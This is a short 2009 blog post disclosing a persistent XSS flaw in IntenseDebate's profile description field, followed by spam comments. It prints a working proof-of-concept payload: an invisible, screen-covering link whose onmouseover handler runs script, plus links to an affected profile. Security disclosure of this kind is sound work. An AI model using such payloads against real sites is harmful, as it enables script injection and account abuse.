This site is soon to be deprecated by http://www.johnleitch.net

Friday, September 25, 2009

Persistent XSS Vulnerability - IntenseDebate.com

The profile description field of Intense Debate has a type 2 XSS vulnerability. Using it, arbitrary code can be run when the affected profile is viewed or when the mouse cursor is over the avatar present next to comments posted by the account.





<a style="position:absolute;top:-500px;left:-500px;width:9999px;height:9999px;" onmouseover="alert(0)"></a>

http://intensedebate.com/people/JohnnyCake5

http://www.woodtv.com/dpp/your_money/wall_street/Stocks_End_Low_As_Healthcare_Recovers_2887663#IDComment35942133

4 comments:

  1. Thanks for the information,I get a better understanding about the issue.And Hope that you have more post for us to read.

    ReplyDelete
  2. XSS vulnerabilities have been reported and exploited since the 1990s. Prominent sites affected in the past include the social-networking sites Twitter, Facebook, MySpace, and Orkut. In recent years, cross-site scripting flaws surpassed buffer overflows to become the most common publicly-reported security vulnerability, with some researchers viewing as many as 68% of websites as likely open to XSS attacks.

    norton promo bike shop melbourne

    ReplyDelete
  3. I'm very glade for recognize this site

    ReplyDelete